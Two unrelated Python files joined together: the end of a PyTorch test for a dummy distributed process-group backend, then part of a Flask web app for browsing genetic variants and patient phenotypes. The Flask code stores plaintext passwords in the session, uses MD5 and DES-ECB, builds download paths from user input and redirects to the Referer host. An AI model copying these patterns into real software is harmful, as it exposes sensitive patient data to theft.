key = "TEST:DummyProcessGroup:barrier"
if self.rank() == 0:
worker_count = 0
# By default, TCPServer lives on rank 0. So rank 0 needs to make
# sure that it does not exit too early before other ranks finish
# using the store.
# Note that, _store_based_barrier does not solve this problem, as
# all ranks need to run at least one store.add(key, 0) before
# exiting, but there is no guarantee that rank 0 is still alive at
# that point.
while worker_count < self.size() - 1:
worker_count = store.add(key, 0)
else:
store.add(key, 1)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupExtensionTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupExtensionTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupExtensionTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupExtensionTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.barrier()
dist.destroy_process_group()
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
dist.barrier()
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly that.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
__init__.py
|
#flask import
from flask import Flask, session
from flask.ext.session import Session
from flask import Response
from flask import stream_with_context, request, Response, make_response
from flask import Flask
from flask import request
from flask import send_file
from flask import session
from flask import g
from flask import redirect
from flask import url_for
from flask import abort
from flask import render_template
from flask import flash
from flask import jsonify
from flask import send_from_directory
from flask.ext.compress import Compress
from flask.ext.runner import Runner
from flask_errormail import mail_on_500
from flask_debugtoolbar import DebugToolbarExtension
import sys
import StringIO
import urllib, base64
import numpy as np
from jinja2_extensions import *
import md5
from scipy.stats import chisquare
import math
from Bio import Entrez
from phenotips_python_client import PhenotipsClient
from phenotips_python_client import browser
from bson.json_util import loads
from mongodb import *
# fizz: hpo lookup
import phizz
import itertools
import json
import os
import pymongo
import pysam
import gzip
from parsing import *
import logging
import lookups
import random
import sys
from utils import *
from collections import defaultdict, Counter
from collections import OrderedDict
from werkzeug.contrib.cache import SimpleCache
from multiprocessing import Process
import glob
import sqlite3
import traceback
import time
from functools import wraps
from werkzeug.exceptions import default_exceptions, HTTPException
import pandas
import csv
import time
import StringIO
from urlparse import urlparse
import pickle
#import pdb
# handles live plotting if necessary
import math
import plotly
print plotly.__version__ # version >1.9.4 required
from plotly.graph_objs import Scatter, Layout
# connect to R session
#import pyRserve
import numpy
import subprocess
from flask import Flask, render_template, redirect, url_for, request
from load_individual import load_patient
from Crypto.Cipher import DES
import base64
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger().setLevel(logging.INFO)
#ADMINISTRATORS = ( 'n.pontikos@ucl.ac.uk',)
#app = Flask(__name__)
#mail_on_500(app, ADMINISTRATORS)
#Compress(app)
#app.config['COMPRESS_DEBUG'] = True
##cache = SimpleCache(default_timeout=60*60*24)
app = Flask(__name__)
ADMINISTRATORS = ( 'n.pontikos@ucl.ac.uk',)
app = Flask(__name__)
mail_on_500(app, ADMINISTRATORS)
Compress(app)
app.config['COMPRESS_DEBUG'] = True
cache = SimpleCache(default_timeout=60*60*24)
REGION_LIMIT = 1E5
EXON_PADDING = 50
# Load default config and override config from an environment variable
#app.config.from_pyfile('uclex.cfg')
app.config.from_pyfile('uclex-old.cfg')
# Check Configuration section for more details
#SESSION_TYPE = 'null'
SESSION_TYPE = 'mongodb'
#SESSION_USE_SIGNER=True
app.config.from_object(__name__)
sess=Session()
sess.init_app(app)
def check_auth(username, password):
"""
This function is called to check if a username / password combination is valid.
Will try to connect to phenotips instance.
"""
print username
conn=PhenotipsClient()
response=conn.get_patient(auth='%s:%s' % (username, password,),number=1)
if response:
session['password2'] = password
password=md5.new(password).hexdigest()
session['user'] = username
session['password'] = password
return True
else: return False
# check that user name and hash of password exist in database
db_users=get_db('users')
# setting a session key for pubmedBatch to save result
session['password2'] = password
password=md5.new(password).hexdigest()
session['user'] = username
session['password'] = password
r=db_users.users.find_one({'user':username})
if r is None:
return False
elif md5.new(r['password']).hexdigest() == md5.new(password).hexdigest():
print('LOGIN', session['user'])
return True
else:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response( 'Could not verify your access level for that URL.\n' 'You have to login with proper credentials', 401, {'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
if session:
if 'user' in session and 'password2' in session and check_auth(session['user'],session['password2']):
return f(*args, **kwargs)
else:
return redirect('https://uclex.cs.ucl.ac.uk/login')
#return render_template('login.html', error='Invalid Credentials. Please try again.')
print 'method', request.method
error=None
if request.method == 'POST':
username=request.form['username']
password=request.form['password']
if check_auth(username,password):
return f(*args, **kwargs)
else:
# doesn't redirect
#return render_template('login.html', error='Invalid Credentials. Please try again.')
#return login()
return redirect('https://uclex.cs.ucl.ac.uk/login')
return decorated
#
@app.route('/login', methods=['GET','POST'])
def login():
print request.method
error = None
print 'login', request.method
print request.form
if request.method == 'POST':
username=request.form['username']
password=request.form['password']
if not check_auth(username,password):
error = 'Invalid Credentials. Please try again.'
else:
return redirect('https://uclex.cs.ucl.ac.uk')
return render_template('login.html', error=error)
#
@app.route('/logout')
def logout():
try:
print session
del session['user']
del session['password']
del session['password2']
del session
except NameError:
return redirect('https://uclex.cs.ucl.ac.uk/login')
return render_template('login.html', error="You have been logged out")
@app.route('/')
@requires_auth
def homepage():
cache_key = 't-homepage'
#t = cache.get(cache_key)
#if t: return t
db=get_db()
total_variants=db.variants.count()
print('total_variants',total_variants,)
total_patients=db.patients.count()
print('total_patients',total_patients,)
male_patients=db.patients.find( {'sex':'M'}).count()
print('male_patients',male_patients,)
female_patients=db.patients.find( {'sex':'F'}).count()
print('female_patients',female_patients,)
unknown_patients=db.patients.find( {'sex':'U'}).count()
dotfile='static/dot/ENSG00000122375_hom_comp.dot'
DOT=file(dotfile,'r').read().replace('\n','\\n')
# replace single quote
DOT=re.sub("'", ''', DOT)
#fontsize=7
# change fontsize to 7
#DOT=re.sub(r'fontsize="\d+"', 'fontsize="%d"' % fontsize, DOT)
exac_variants=db.variants.find({'in_exac':True}).count()
print('exac_variants',exac_variants,)
pass_variants=db.variants.find({'filter':'PASS'}).count()
print('pass_variants',pass_variants,)
pass_exac_variants=db.variants.find({'in_exac':True,'filter':'PASS'}).count()
print('pass_exac_variants',pass_exac_variants,)
pass_exac_variants=db.variants.find({'in_exac':True,'filter':'PASS'}).count()
nonexac_variants=db.variants.find({'in_exac':False}).count()
pass_nonexac_variants=db.variants.find({'in_exac':False,'filter':'PASS'}).count()
nonpass_variants=(total_variants-pass_variants)
nonpass_nonexac_variants=nonexac_variants-pass_nonexac_variants
#labels = 'PASS', 'non-PASS',
#sizes =[100*pass_variants/float(total_variants),100*(nonpass_variants)/float(total_variants)]
#print(sizes)
#colors = ['yellowgreen', 'red']
#explode = (0.1, 0)
#plt.figure(figsize=(5,5))
#plt.margins(1, 1)
#plt.pie(sizes, explode=explode, labels=labels, colors=colors, autopct='%1.1f%%', shadow=True, startangle=90)
## Set aspect ratio to be equal so that pie is drawn as a circle.
#plt.axis('equal')
#plt.axis('off')
#plt.show()
# word cloud
#from os import path
#from wordcloud import WordCloud
#text = 'HPO HPO HPO HPO all day'
## Read the whole text.
## take relative word frequencies into account, lower max_font_size
#wordcloud = WordCloud().generate(text)
#plt.figure()
#plt.imshow(wordcloud)
#plt.axis("off")
#plt.show()
#imgdata = StringIO.StringIO()
#plt.savefig(imgdata, format='svg')
#imgdata.seek(0) # rewind the data
#import urllib
#image=urllib.quote(base64.b64encode(imgdata.buf))
#image=imgdata.buf
#image = '<svg' + image.split('<svg')[1]
t = render_template('homepage.html',
total_patients=total_patients,
male_patients=male_patients,
female_patients=female_patients,
unknown_patients=unknown_patients,
DOT=DOT,
total_variants=total_variants,
exac_variants=exac_variants,
pass_variants=pass_variants,
pass_exac_variants=pass_exac_variants,
pass_nonexac_variants=pass_nonexac_variants,
#image=image.decode('utf8'))
image="")
#cache.set(cache_key, t)
return t
@app.route('/set/<query>')
def set(query):
value = query
session['key'] = value
return value
@app.route('/get/')
def get():
return session.get('key', 'not set')
def get_db(dbname=None):
"""
Opens a new database connection if there is none yet for the
current application context.
"""
if dbname is None: dbname=app.config['DB_NAME']
if not hasattr(g, 'db_conn'):
g.db_conn=dict()
g.db_conn[dbname] = connect_db(dbname)
elif dbname not in g.db_conn:
g.db_conn[dbname] = connect_db(dbname)
return g.db_conn[dbname]
def get_R_session():
if not hasattr(g, 'R_session'): g.R_session=pyRserve.connect()
return g.R_session
def get_hpo_graph():
"""
"""
if not hasattr(g, 'hpo_graph'):
from hpo_similarity.ontology import Ontology
from hpo_similarity.similarity import CalculateSimilarity
ontology=Ontology(app.config['HPO_OBO'])
g.hpo_graph=ontology.get_graph()
return g.hpo_graph
def connect_db(dbname=None):
"""
Connects to the specific database.
"""
client = pymongo.MongoClient(host=app.config['DB_HOST'], port=app.config['DB_PORT'])
print(client)
if not dbname: dbname=app.config['DB_NAME']
print(dbname)
return client[dbname]
def parse_tabix_file_subset(tabix_filenames, subset_i, subset_n, record_parser):
"""
Returns a generator of parsed record objects (as returned by record_parser) for the i'th out n subset of records
across all the given tabix_file(s). The records are split by files and contigs within files, with 1/n of all contigs
from all files being assigned to this the i'th subset.
Args:
tabix_filenames: a list of one or more tabix-indexed files. These will be opened using pysam.Tabixfile
subset_i: zero-based number
subset_n: total number of subsets
record_parser: a function that takes a file-like object and returns a generator of parsed records
"""
start_time = time.time()
print(tabix_filenames)
open_tabix_files = [pysam.Tabixfile(tabix_filename) for tabix_filename in tabix_filenames]
tabix_file_contig_pairs = [(tabix_file, contig) for tabix_file in open_tabix_files for contig in tabix_file.contigs]
# get every n'th tabix_file/contig pair
tabix_file_contig_subset = tabix_file_contig_pairs[subset_i : : subset_n]
short_filenames = ", ".join(map(os.path.basename, tabix_filenames))
print(short_filenames)
num_file_contig_pairs = len(tabix_file_contig_subset)
print(("Loading subset %(subset_i)s of %(subset_n)s total: %(num_file_contig_pairs)s contigs from %(short_filenames)s") % locals())
counter = 0
for tabix_file, contig in tabix_file_contig_subset:
header_iterator = tabix_file.header
records_iterator = tabix_file.fetch(contig, 0, 10**9, multiple_iterators=True)
for parsed_record in record_parser(itertools.chain(header_iterator, records_iterator)):
counter += 1
yield parsed_record
if counter % 100000 == 0:
seconds_elapsed = int(time.time()-start_time)
print(("Loaded %(counter)s records from subset %(subset_i)s of %(subset_n)s from %(short_filenames)s " "(%(seconds_elapsed)s seconds)") % locals())
print("Finished loading subset %(subset_i)s from %(short_filenames)s (%(counter)s records)" % locals())
def create_cache():
"""
This is essentially a compile step that generates all cached resources.
Creates files like autocomplete_entries.txt
Should be run on every redeploy.
"""
# create autocomplete_entries.txt
autocomplete_strings = []
for gene in get_db().genes.find():
autocomplete_strings.append(gene['gene_name'])
if 'other_names' in gene:
autocomplete_strings.extend(gene['other_names'])
f = open(os.path.join(app.config['UCLEX_FILES_DIRECTORY'],'autocomplete_strings.txt'), 'w')
for s in sorted(autocomplete_strings):
f.write(s+'\n')
f.close()
# create static gene pages for genes in
if not os.path.exists(app.config['GENE_CACHE_DIR']): os.makedirs(app.config['GENE_CACHE_DIR'])
# get list of genes ordered by num_variants
for gene_id in app.config['GENES_TO_CACHE']:
try:
page_content = get_gene_page_content(gene_id)
except Exception as e:
print e
continue
f = open(os.path.join(app.config['GENE_CACHE_DIR'], '{}.html'.format(gene_id)), 'w')
f.write(page_content)
f.close()
def precalculate_metrics():
db = get_db()
print 'Reading %s variants...' % db.variants.count()
metrics = defaultdict(list)
binned_metrics = defaultdict(list)
progress = 0
start_time = time.time()
for variant in db.variants.find(fields=['quality_metrics', 'site_quality', 'allele_num', 'allele_count']):
for metric, value in variant['quality_metrics'].iteritems():
metrics[metric].append(float(value))
qual = float(variant['site_quality'])
metrics['site_quality'].append(qual)
if variant['allele_num'] == 0: continue
if variant['allele_count'] == 1:
binned_metrics['singleton'].append(qual)
elif variant['allele_count'] == 2:
binned_metrics['doubleton'].append(qual)
else:
for af in AF_BUCKETS:
if float(variant['allele_count'])/variant['allele_num'] < af:
binned_metrics[af].append(qual)
break
progress += 1
if not progress % 100000:
print 'Read %s variants. Took %s seconds' % (progress, int(time.time() - start_time))
print 'Done reading variants. Dropping metrics database... '
db.metrics.drop()
print 'Dropped metrics database. Calculating metrics...'
for metric in metrics:
bin_range = None
data = map(numpy.log, metrics[metric]) if metric == 'DP' else metrics[metric]
if metric == 'FS':
bin_range = (0, 20)
elif metric == 'VQSLOD':
bin_range = (-20, 20)
elif metric == 'InbreedingCoeff':
bin_range = (0, 1)
if bin_range is not None:
data = [x if (x > bin_range[0]) else bin_range[0] for x in data]
data = [x if (x < bin_range[1]) else bin_range[1] for x in data]
hist = numpy.histogram(data, bins=40, range=bin_range)
edges = hist[1]
# mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
lefts = [edges[i] for i in range(len(edges)-1)]
db.metrics.insert({
'metric': metric,
'mids': lefts,
'hist': list(hist[0])
})
for metric in binned_metrics:
hist = numpy.histogram(map(numpy.log, binned_metrics[metric]), bins=40)
edges = hist[1]
mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
db.metrics.insert({
'metric': 'binned_%s' % metric,
'mids': mids,
'hist': list(hist[0])
})
db.metrics.ensure_index('metric')
print 'Done pre-calculating metrics!'
def response(POS, REF, ALT, index, geno, chrom, pos):
homozygous_genotype='/'.join([str(index),str(index)])
heterozygous_genotype='/'.join(['0',str(index)])
variant=dict()
variant['pos']=POS
variant['ref']=REF
variant['alt']=ALT
variant['hom_samples']=[h for h in geno if geno[h].split(':')[0]==homozygous_genotype][0:100]
variant['HOM_COUNT']=len(variant['hom_samples'])
variant['het_samples']=[h for h in geno if geno[h].split(':')[0]==heterozygous_genotype][0:100]
variant['HET_COUNT']=len(variant['het_samples'])
variant['wt_samples']=[h for h in geno if geno[h].split(':')[0]=='0/0'][1:100]
variant['WT_COUNT']=len([h for h in geno if geno[h].split(':')[0]=='0/0'])
variant['MISS_COUNT']=len([h for h in geno if geno[h].split(':')[0]=='./.'])
variant['allele_num']= 2*(variant['HOM_COUNT'] + variant['HET_COUNT']+variant['WT_COUNT'])
variant['allele_count']=2*variant['HOM_COUNT'] + variant['HET_COUNT']
#variant['site_quality'] = variant['QUAL']
#variant['filter'] = variant['FILTER']
if variant['WT_COUNT']==0:
variant['allele_freq'] = None
else:
variant['allele_freq'] = float(variant['HET_COUNT']+2*variant['HOM_COUNT']) / float(2*variant['WT_COUNT'])
var2='-'.join([str(chrom),str(pos),variant['ref'],variant['alt']])
variant['variant_id']=var2
samples=variant['het_samples']+variant['hom_samples']
print(samples)
variant['hpo']=[p for p in get_db('patients').patients.find({'external_id':{'$in':samples}},{'_id':0,'features':1,'external_id':1})]
return(jsonify(result=variant))
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
#from uclex_base import *
#from uclex_gene import *
#def get_db(dbname=None):
# """
# Opens a new database connection if there is none yet for the
# current application context.
# """
# if dbname is None: dbname=app.config['DB_NAME']
# if not hasattr(g, 'db_conn'):
# g.db_conn=dict()
# g.db_conn[dbname] = connect_db(dbname)
# elif dbname not in g.db_conn:
# g.db_conn[dbname] = connect_db(dbname)
# return g.db_conn[dbname]
@app.route('/autocomplete/<query>')
def awesome_autocomplete(query):
if not hasattr(g, 'autocomplete_strings'): g.autocomplete_strings = [s.strip() for s in open(os.path.join(app.config['UCLEX_FILES_DIRECTORY'], 'autocomplete_strings.txt'))]
suggestions = lookups.get_awesomebar_suggestions(g, query)
return Response(json.dumps([{'value': s} for s in suggestions]), mimetype='application/json')
@app.route('/awesome')
def awesome():
db = get_db()
query = str(request.args.get('query'))
#for n in dir(request): print(n, getattr(request,n))
#print(request.HTTP_REFERER)
print(request.referrer)
if request.referrer:
referrer=request.referrer
u = urlparse(referrer)
referrer='%s://%s' % (u.scheme,u.hostname,)
if u.port: referrer='%s:%s' % (referrer,u.port,)
else:
referrer=''
#u.netloc
print(referrer)
datatype, identifier = lookups.get_awesomebar_result(db, query)
print "Searched for %s: %s" % (datatype, identifier)
if datatype == 'gene':
return redirect('{}/gene/{}'.format(referrer,identifier))
elif datatype == 'transcript':
return redirect('{}/transcript/{}'.format(referrer,identifier))
elif datatype == 'variant':
return redirect('{}/variant/{}'.format(referrer,identifier))
elif datatype == 'region':
return redirect('{}/region/{}'.format(referrer,identifier))
elif datatype == 'dbsnp_variant_set':
return redirect('{}/dbsnp/{}'.format(referrer,identifier))
elif datatype == 'hpo':
return redirect('{}/hpo/{}'.format(referrer,identifier))
elif datatype == 'mim':
return redirect('{}/mim/{}'.format(referrer,identifier))
elif datatype == 'error':
return redirect('{}/error/{}'.format(referrer,identifier))
elif datatype == 'not_found':
return redirect('{}/not_found/{}'.format(referrer,identifier))
else:
raise Exception
@app.route('/patient/<patient_str>')
def get_patient(patient_str):
pass
# AJAX
# Not finished
@app.route('/chisqu/<variant_str>',methods=['GET','POST'])
def chisq(variant_str):
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
print('hpo_patients',hpo_patients,)
variant_str=str(variant_str).strip().replace('_','-')
chrom, pos, ref, alt = variant_str.split('-')
tb=pysam.TabixFile('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/chr%s.vcf.gz' % chrom,)
region=str('%s:%s-%s'%(chrom, pos, int(pos),))
headers=[h for h in tb.header]
headers=(headers[len(headers)-1]).strip().split('\t')
print(region)
records=tb.fetch(region=region)
geno=dict(zip(headers, [r.split('\t') for r in records][0]))
samples=[h for h in geno if geno[h].split(':')[0]=='0/1' or geno[h].split(':')[0]=='1/1']
#d=csv.DictReader(file('/data/uclex_files/UCLexInfo/uclex-samples.csv','r'),delimiter=',')
#headers=file('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/headers.txt','r').read().strip().replace('#','').split('\t')
#d=csv.DictReader(file('/data/UCLpheno/uclex-hpo.txt','r'),delimiter='\t')
res=jsonify(result=hpo_patients)
return res
def stream_template(template_name, **context):
app.update_template_context(context)
t = app.jinja_env.get_template(template_name)
rv = t.stream(context)
rv.enable_buffering(5)
return rv
@app.route('/my-large-page.html')
def render_large_template():
rows = iter_all_rows()
return Response(stream_template('the_template.html', rows=rows))
@app.route('/stream')
def streamed_response():
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(stream_with_context(generate()))
def generate_patient_table():
def get_variants(variant_ids):
for vid in db.variants.find({'variant_id':{'$in':variant_ids}}):
yield
'''
serve the Vincent annotated csv files
'''
@app.route('/download/send_csv', methods=['GET','POST'])
@requires_auth
def download_csv():
conn=PhenotipsClient()
p_id = request.args.get('p_id')
auth='%s:%s' % (session['user'],session['password2'],)
p=conn.get_patient(eid=p_id,auth=auth)
if not p: return 'Sorry you are not permitted to see this patient, please get in touch with us to access this information.'
folder = request.args.get('folder')
path = '/slms/UGI/vm_exports/vyp/phenotips/DROPBOX/'
csv_file = os.path.join(path,folder, p_id + '.csv')
filename = folder+'_'+p_id+'.csv'
if not os.path.isfile(csv_file):
return 'Oops, file not found!'
return send_file(csv_file,
mimetype='text/csv',
attachment_filename=filename,
as_attachment=True)
def encrypt(s):
obj=DES.new(session['password'][:8], DES.MODE_ECB)
s=s+(8-(len(s) % 8))*' '
s=obj.encrypt(s)
s=base64.urlsafe_b64encode(s)
return s
def decrypt(s):
obj=DES.new(session['password'][:8], DES.MODE_ECB)
s=base64.urlsafe_b64decode(str(s))
s=obj.decrypt(s)
s=s.replace(' ','')
return s
# shows each individual,
# all_individuals
@app.route('/individuals')
@requires_auth
def individuals_page():
page=int(request.args.get('page',0))
number=int(request.args.get('number',500))
hpo_db=get_db('hpo')
def f(p):
print p['external_id']
p['features']=[f for f in p.get('features',[]) if f['observed']=='yes']
if 'solved' in p:
if 'gene' in p['solved']:
p['solved']=[p['solved']['gene']]
else:
p['solved']=[]
else: p['solved']=[]
if 'genes' in p: p['genes']=[x['gene'] for x in p['genes'] if 'gene' in x]
else: p['genes']=[]
p['genes']=list(frozenset(p['genes']+p['solved']))
p2=get_db().patients.find_one({'external_id':p['external_id']},{'homozygous_variants_count':1,'compound_hets_count':1, 'rare_variants_count':1})
if not p2: return p
p['rare_homozygous_variants_count']=p2.get('homozygous_variants_count','')
p['rare_compound_hets_count']=p2.get('compound_hets_count','')
p['rare_variants_count']=p2.get('rare_variants_count','')
#p['all_variants_count']=get_db().patients.find_one({'external_id':p['external_id']},{'_id':0,'all_variants_count':1})['all_variants_count']
#db.cache.find_one({"key" : "%s_blindness,macula,macular,retina,retinal,retinitis,stargardt_" % })
return p
conn=PhenotipsClient()
auth='%s:%s' % (session['user'],session['password2'],)
patients=conn.get_patient(auth=auth,start=page*number,number=number).get('patientSummaries',[])
eids=[p['eid'] for p in patients]
print(eids)
patients=get_db('patients').patients.find({'external_id':{'$in':eids}})
#patients=get_db('patients').patients.find({'external_id':re.compile('^IRDC')},{'pubmedBatch':0})
individuals=[f(p) for p in patients if 'external_id' in p]
# family_history":{"consanguinity":true}
#if session['user']=='demo': for ind in individuals: ind['external_id']=encrypt(ind['external_id'])
return render_template('individuals_page.html',individuals=individuals)
@app.route('/research_pubmed', methods=['POST'])
def research_pubmed():
# use new search terms to update the individual-pubmedbatch table
patient_id = request.form['p_id']
search_term = request.form['OR']
# update patient pubmed result status as running (1)
db=get_db()
db.patients.update({'external_id':patient_id},{'$set': {'pubmedbatch.status': 1}})
# do the actual update
#exit_status = subprocess.call(['python','individual_pubmedBatch.py', '-p', patient_id, '--OR', search_term])
exit_status=0
# reset update status to 0
db.patients.update({'external_id':patient_id},{'$set': {'pubmedbatch.status': 0}})
return str(exit_status)
@app.route('/hpo')
def hpo_main():
# HPO summary page
# major groups, borrowed from phenotips
major_groups = {'GROWTH PARAMETERS':['HP:0000256','HP:0000252','HP:0000098','HP:0004322','HP:0004324','HP:0004325','HP:0001508','HP:0001528'],'CRANIOFACIAL':['HP:0001363','HP:0000204','HP:0000175','HP:0001999'],'EYE DEFECTS':['HP:0000505','HP:0000481','HP:0000589','HP:0000593','HP:0000518','HP:0000479','HP:0000587','HP:0000568','HP:0000639','HP:0000486','HP:0000601','HP:0000316'],'EAR DEFECTS':['HP:0000407','HP:0000405','HP:0004467','HP:0000384','HP:0000356','HP:0000359'],'CUTANEOUS':['HP:0000953','HP:0001010','HP:0005306','HP:0011276'],'CARDIOVASCULAR':['HP:0001631','HP:0001629','HP:0001674','HP:0001680','HP:0001636','HP:0001638','HP:0011675'],'RESPIRATORY':['HP:0000776','HP:0002088'],'MUSCULOSKELETAL':['HP:0002652','HP:0002659','HP:0009816','HP:0009824','HP:0100490','HP:0001836','HP:0006101','HP:0001770','HP:0100258','HP:0100259','HP:0001180','HP:0001849','HP:0002650','HP:0000925','HP:0001371','HP:0001762'],'GASTROINTESTINAL':['HP:0002032','HP:0002575','HP:0001543','HP:0001539','HP:0002251','HP:0001396','HP:0002910','HP:0001738','HP:0000819'],'GENITOURINARY':['HP:0000107','HP:0000085','HP:0000069','HP:0000795','HP:0000062','HP:0000047','HP:0000028'],'BEHAVIOR, COGNITION AND DEVELOPMENT':['HP:0001263','HP:0010862','HP:0002194','HP:0000750','HP:0001328','HP:0001256','HP:0002342','HP:0010864','HP:0007018','HP:0000717','HP:0000708'],'NEUROLOGICAL':['HP:0001290','HP:0001250','HP:0001251','HP:0001332','HP:0002072','HP:0001257','HP:0010301','HP:0002011']}
hpo_freq = lookups.get_hpo_size_freq('hpo_freq.tsv')
return str(hpo_freq)
@app.route('/hpo/<hpo_id>')
def hpo_page(hpo_id):
patients_db=get_db('patients')
db=get_db()
hpo_db=get_db('hpo')
patients_db=get_db('patients')
#patients=[p for p in patients_db.patients.find( { 'features': {'$elemMatch':{'id':str(hpo_id)}} } )]
print(hpo_id)
if not hpo_id.startswith('HP:'):
hpo_id=hpo_db.hpo.find_one({'name':hpo_id})['id'][0]
print(hpo_id)
hpo_name=hpo_db.hpo.find_one({'id':hpo_id})['name'][0]
print('HPO ANCESTORS')
hpo_ancestors=lookups.get_hpo_ancestors(hpo_db,hpo_id)
print(len(hpo_ancestors))
print([h['name'] for h in hpo_ancestors])
#print(len([v['VARIANT_ID'] for v in db.variants.find({'HET' : { '$in': patient_ids }})]))
#print(len([v['VARIANT_ID'] for v in db.variants.find({'HOM' : { '$in': patient_ids }})]))
#r=patients_db.hpo.find_one({'hp_id':hpo_id})
#if r: external_ids=r['external_ids']
#else: external_ids=[]
genes=[lookups.get_gene_by_name(db, r['Gene-Name']) for r in hpo_db.hpo_gene.find({'HPO-ID':hpo_id})]
print('num genes', len(genes))
#for r in hpo_db.hpo_pubmed.find({'hpoid':hpo_id}): print(r)
#pmids=[r['pmid'] for r in hpo_db.hpo_pubmed.find({'hpoid':hpo_id})]
patients=lookups.get_hpo_patients(hpo_db,patients_db,hpo_id)
print('num patients', len(patients))
pmids=[]
## only return common variants if there are many individuals
##rsession.voidEval('common_variants <- common.variants')
## private variants (not seen in others in the cohort)
##rsession.voidEval('common_variants <- common.variants')
#variants=rsession.r.private_variants(hpo_patients)
#if type(variants) is str:
#variants=[variants]
#else:
#variants=variants.tolist()
#print('num variants',len(variants),)
#variants=[db.variants.find_one({'variant_id':v.replace('_','-')}) for v in variants[:100]]
#[variant for variant in lookups.get_variants_in_gene(db, g['gene_id'])]
#if variant['major_consequence']!='stop_gained': continue
#print(variant)
#break
#print( lookups.get_variants_in_gene(db, 'CNNM4') )
#vcf_reader = pysam.VariantFile('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/chr%s.vcf.gz' % '22')
#for record in vcf_reader:
#for s in external_ids:
#r=record.samples[s]
#if 'GT' in r: print(r['GT'])
return render_template('phenotype.html',hpo_id=hpo_id,hpo_name=hpo_name,individuals=[str(p['external_id']) for p in patients],genes=genes,pmids=pmids,variants=[])
# AJAX
# fetch patients iwth hpo term
@app.route('/fetch_hpo',methods=['GET','POST'])
def fetch_hpo():
if request.method=='POST':
hpo_ids=request.form['hpo_ids'].strip().split(',')
else:
hpo_ids=request.args.get('hpo_ids').strip().split(',')
hpo_id=hpo_ids[0]
print('HPO',hpo_id)
hpo_db=get_db('hpo')
patients_db=get_db('patients')
hpo_patients=[p['external_id'] for p in lookups.get_hpo_patients(hpo_db,patients_db,hpo_id)]
print('num patients',len(hpo_patients))
res=jsonify(result=hpo_patients)
return res
# AJAX
# fetch variants private to patients
# That is variants which are only seen in these patients and no one else.
@app.route('/fetch_private_variants',methods=['GET','POST'])
def fetch_private_variants():
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
print('hpo_patients',hpo_patients,)
db=get_db()
if len(hpo_patients)==1:
variants=db.variants.find({'PRIVATE_MUT':hpo_patients})
else:
#rsession=get_R_session()
variants=rsession.r.private_variants(hpo_patients)
#variants=[]
print('private variants', variants)
if type(variants) is str:
variants=[variants]
else:
variants=variants.tolist()
print('num of private variants',len(variants),)
res=jsonify(result=variants)
return res
# AJAX
# fetch common variants to patients
# That is variants which are seen in all these patients.
@app.route('/fetch_common_variants',methods=['GET','POST'])
def fetch_common_variants():
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
